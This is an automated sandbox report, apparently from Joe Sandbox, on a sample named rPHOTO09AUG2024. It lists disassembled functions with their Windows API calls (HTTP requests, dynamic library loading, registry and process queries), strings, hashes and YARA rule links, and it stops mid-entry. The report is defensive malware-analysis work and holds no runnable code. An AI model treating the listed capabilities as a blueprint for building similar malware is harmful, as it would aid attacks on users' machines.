Instruction Fuzzy Hash: DB914B75608301DFCB10DF25C48599BBBE8EF89354F04896EF89A8B361DB31E905CB62

Function 00DA2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5FEC6: _wcscpy.LIBCMT ref: 00D5FEE9

_memset.LIBCMT ref: 00DA3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DA30A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DA3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DA3187

Strings

0, xrefs: 00DA3063

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: d2d63115068cd9b8ab5f078e211bcba85a6bf5866f9fac149338e24b86838814
Instruction ID: 8d1f4eec3e10d52760d9c555ddefe4f2fe385b045716adfc75a6b9b9a9907183
Opcode Fuzzy Hash: d2d63115068cd9b8ab5f078e211bcba85a6bf5866f9fac149338e24b86838814
Instruction Fuzzy Hash: E351D0716083019FD7259F28D845A6BBBE6EF96360F084A2DF895E31D1DB70CE4487B2

Function 00D9DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D9DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D9DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D9DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D9DB8E

Strings

DllGetClassObject, xrefs: 00D9DB01

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: d767c8565c99258643747703629b4d2a5238495b13c0fdb4957b724beba85609
Instruction ID: 2bb9cffa96fc1fcd35883581988db1f630eefc4afe1a4f12e2a79a86a8ba886c
Opcode Fuzzy Hash: d767c8565c99258643747703629b4d2a5238495b13c0fdb4957b724beba85609
Instruction Fuzzy Hash: 9C415EB1600209EFDF15CF55C884AAABBBAEF48354F1580AAA9059F205D7B1D944CBB0

Function 00DA2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DA2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DA2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00DA2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E06890,00000000), ref: 00DA2D5A

Strings

0, xrefs: 00DA2CA4

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: ec3fadc565dcc72305ba8fcf14e215ccb16d03e377cc6e9f55426b8037addf49
Instruction ID: e673cc3c9777fc2e86f1011c54060ba5804ccdfeac0002db957be813c5b64110
Opcode Fuzzy Hash: ec3fadc565dcc72305ba8fcf14e215ccb16d03e377cc6e9f55426b8037addf49
Instruction Fuzzy Hash: 094194301043029FDB14DF29C845B6AB7E5EF86320F18465DF9A597292D770E904CBB2

Function 00DBDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00DBDAD9

Part of subcall function 00D479AB: _memmove.LIBCMT ref: 00D479F9

Strings

stdcall, xrefs: 00DBDB5B
winapi, xrefs: 00DBDB4A
cdecl, xrefs: 00DBDB30
none, xrefs: 00DBDBB4

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 042a0fb793248801f5697bc905289f3d65dbc6ef426db2dff7209bb6653bc6a8
Instruction ID: c83cd97039192176a9fc73fece7fc1b5e8b5d47df70a34f53994e7012ad2a2b6
Opcode Fuzzy Hash: 042a0fb793248801f5697bc905289f3d65dbc6ef426db2dff7209bb6653bc6a8
Instruction Fuzzy Hash: 1E318F7190061AEFCF10EF54C8819EEB7B5FF05320B14862AE966A7791DB31A905CBB4

Function 00D99372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00D9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D9B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D993F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D99409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00D99439

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

Strings

ListBox, xrefs: 00D993B5
ComboBox, xrefs: 00D99380

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: b1b850d602854259fa5c4b8ea0a8ea95d267b878cb9ef3d005af2bf05a51475f
Instruction ID: 0e3d63333f18ebbf0bd568d8e699c1f420f2c0428aa77016153271423206c77c
Opcode Fuzzy Hash: b1b850d602854259fa5c4b8ea0a8ea95d267b878cb9ef3d005af2bf05a51475f
Instruction Fuzzy Hash: 0821E171940108AFDF14ABB4DC96DFFB768DF05360B14822DF925A72E1DB354A0A9630

Function 00DB1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DB1B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DB1B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DB1B96
InternetCloseHandle.WININET(00000000), ref: 00DB1BDD

Part of subcall function 00DB2777: GetLastError.KERNEL32(?,?,00DB1B0B,00000000,00000000,00000001), ref: 00DB278C
Part of subcall function 00DB2777: SetEvent.KERNEL32(?,?,00DB1B0B,00000000,00000000,00000001), ref: 00DB27A1

Strings

, xrefs: 00DB1B87

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 79d35f84ac7a49b22f0e6602c4aed6bd085ab4ceb6c235ed43805c2495284dfc
Instruction ID: a7be1509b6224ed9e10cb958dea8b8c7e2ba4d813f1b82b755757b391177d875
Opcode Fuzzy Hash: 79d35f84ac7a49b22f0e6602c4aed6bd085ab4ceb6c235ed43805c2495284dfc
Instruction Fuzzy Hash: 4E21CDB6600209FFEB119F218C95EFF76EDEB8A744F50012AF406E2240EA309E0597B5

Function 00DC6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D41D73
Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DC66D0
LoadLibraryW.KERNEL32(?), ref: 00DC66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DC66EC
DestroyWindow.USER32(?), ref: 00DC66F4

Strings

SysAnimate32, xrefs: 00DC66AB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: c2954b86161631198069cae0f9ee041ce3836082336a48a7de38e2c4e3711b3b
Instruction ID: 597a5befc3c0848107334cf926cb38c5b0dbcb407756354a44db4608d6365d35
Opcode Fuzzy Hash: c2954b86161631198069cae0f9ee041ce3836082336a48a7de38e2c4e3711b3b
Instruction Fuzzy Hash: F421477124020BABEF104F64EC80FAB77ADEF59368F184629FA51931A0D772DC919771

Function 00DA703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00DA705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA7091
GetStdHandle.KERNEL32(0000000C), ref: 00DA70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00DA70DD

Strings

nul, xrefs: 00DA70D8

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 114aaf6fe67ccfec25695feb88a5e6ee9625d3959476ee77358dbfa15c6b10f1
Instruction ID: be6b940ff184d866867e6af3341f2fe88b6697db401399de4b103f8178615abb
Opcode Fuzzy Hash: 114aaf6fe67ccfec25695feb88a5e6ee9625d3959476ee77358dbfa15c6b10f1
Instruction Fuzzy Hash: 2121817450430AAFDB209F28DC05A9AB7B8BF46720F244A29FCA0D72D0E770D8408B78

Function 00DA710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00DA712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA715D
GetStdHandle.KERNEL32(000000F6), ref: 00DA716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00DA71A8

Strings

nul, xrefs: 00DA71A3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: a4e70f5976b1c96ca0230d9e2c3174a1e6970187a0ebd3e9976203e690f0566f
Instruction ID: d6d6d2770958ab63caad8ca85dbdbefa46ab0925c6ce29e20cb0f96841bdd54c
Opcode Fuzzy Hash: a4e70f5976b1c96ca0230d9e2c3174a1e6970187a0ebd3e9976203e690f0566f
Instruction Fuzzy Hash: 1C2183756047069BDB209F68DC44EAAB7E8AF56720F240A19FDE1D72D0E770D841CB74

Function 00DAAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DAAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DAAF13
__swprintf.LIBCMT ref: 00DAAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00DCF910), ref: 00DAAF6A

Strings

%lu, xrefs: 00DAAF26

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 03a62d5c2ae1d23eb604466b4082ad7e049838e36d17f5c173aa865913105efd
Instruction ID: 4a80cfb2ee210c5fc9539fc1e36923e10675aeb8b1d6c0fcea587fa531494646
Opcode Fuzzy Hash: 03a62d5c2ae1d23eb604466b4082ad7e049838e36d17f5c173aa865913105efd
Instruction Fuzzy Hash: 12217131A00209AFCB10DF65C885EEEBBB9EF89704B144069F909EB351DB71EA45CB31

Function 00D9A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

Part of subcall function 00D9A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D9A399
Part of subcall function 00D9A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D9A3AC
Part of subcall function 00D9A37C: GetCurrentThreadId.KERNEL32 ref: 00D9A3B3
Part of subcall function 00D9A37C: AttachThreadInput.USER32(00000000), ref: 00D9A3BA

GetFocus.USER32 ref: 00D9A554

Part of subcall function 00D9A3C5: GetParent.USER32(?), ref: 00D9A3D3

GetClassNameW.USER32(?,?,00000100), ref: 00D9A59D
EnumChildWindows.USER32(?,00D9A615), ref: 00D9A5C5
__swprintf.LIBCMT ref: 00D9A5DF

Strings

%s%d, xrefs: 00D9A5D9

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 17c306b813259c86fa0d94a77dd0001c269dbf1fcaf42cd628e3b3402fcc7557
Instruction ID: f6f7a0a166872c5436a242506cfa781be43507bcc078da3423a5f223bfb19321
Opcode Fuzzy Hash: 17c306b813259c86fa0d94a77dd0001c269dbf1fcaf42cd628e3b3402fcc7557
Instruction Fuzzy Hash: 3211B172600219BBDF10BFB8DC85FEA3779EF49700F044079BD08AA192CB7059498BB5

Function 00DA2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DA2048

Strings

EXISTS, xrefs: 00DA2070
APPEND, xrefs: 00DA2081
KEYS, xrefs: 00DA205F
REMOVE, xrefs: 00DA204E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 1f0cfb9168d54f32436cd6ea88fab99f6013b012a98b4ce49a4169edd5643c08
Instruction ID: 90403dce56c5db68a5abd12e160fea5470ae72207d1aabdda4645bc77586a892
Opcode Fuzzy Hash: 1f0cfb9168d54f32436cd6ea88fab99f6013b012a98b4ce49a4169edd5643c08
Instruction Fuzzy Hash: 61111B7091020A9FCF00EFA8D9518FEB7B4FF16304B558569D965A7352EB32A90ACF70

Function 00DBEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DBEF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DBEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DBF07E
CloseHandle.KERNEL32(?), ref: 00DBF0FF

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 422b4e622c0bab8794ad8eb2badc0af87fa0a14557827d7cc8227dc9357477a7
Instruction ID: ea2049a355ce6ec62c33abbf36377692e66b34286f5190508448a1af3118c06b
Opcode Fuzzy Hash: 422b4e622c0bab8794ad8eb2badc0af87fa0a14557827d7cc8227dc9357477a7
Instruction Fuzzy Hash: C0812FB16043019FD720EF29C856B6AB7E5EF48710F14882DF59ADB392DA71AD408B61

Function 00DC02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00DC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DC0038,?,?), ref: 00DC10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DC03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DC040E
RegCloseKey.ADVAPI32(?,?), ref: 00DC043A
RegCloseKey.ADVAPI32(00000000), ref: 00DC0447

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 56347b28dc6a9654d99ee1f866c55a7d208886ff520ca975ce1cd33ebee52891
Instruction ID: ec89163480cf9286603cc514fe24c5e4f67a42b39a69836bd4e2fd430fc1f039
Opcode Fuzzy Hash: 56347b28dc6a9654d99ee1f866c55a7d208886ff520ca975ce1cd33ebee52891
Instruction Fuzzy Hash: 5B513931208245EFD704EB64D881F6ABBE9FF84704F44892DB59597292DB30E904DB72

Function 00DBDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBDC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00DBDCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00DBDCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00DBDD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBDD35

Part of subcall function 00D45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7B20,?,?,00000000), ref: 00D45B8C
Part of subcall function 00D45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7B20,?,?,00000000,?,?), ref: 00D45BB0

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 2786354d5b2581bae36503cbec4f0228cddca78eaecda2babd8fc3f6516cab49
Instruction ID: 07ad90439c315b13c469697fefcdc662082768f98f7c4926a8e8b3c7fbcf4dbf
Opcode Fuzzy Hash: 2786354d5b2581bae36503cbec4f0228cddca78eaecda2babd8fc3f6516cab49
Instruction Fuzzy Hash: E151F575A00606DFCB00EF68C4959ADBBF5EF58310B188069E85AAB312DB71ED45CFA1

Function 00DAE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DAE88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00DAE8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DAE8F2

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DAE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DAE91F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
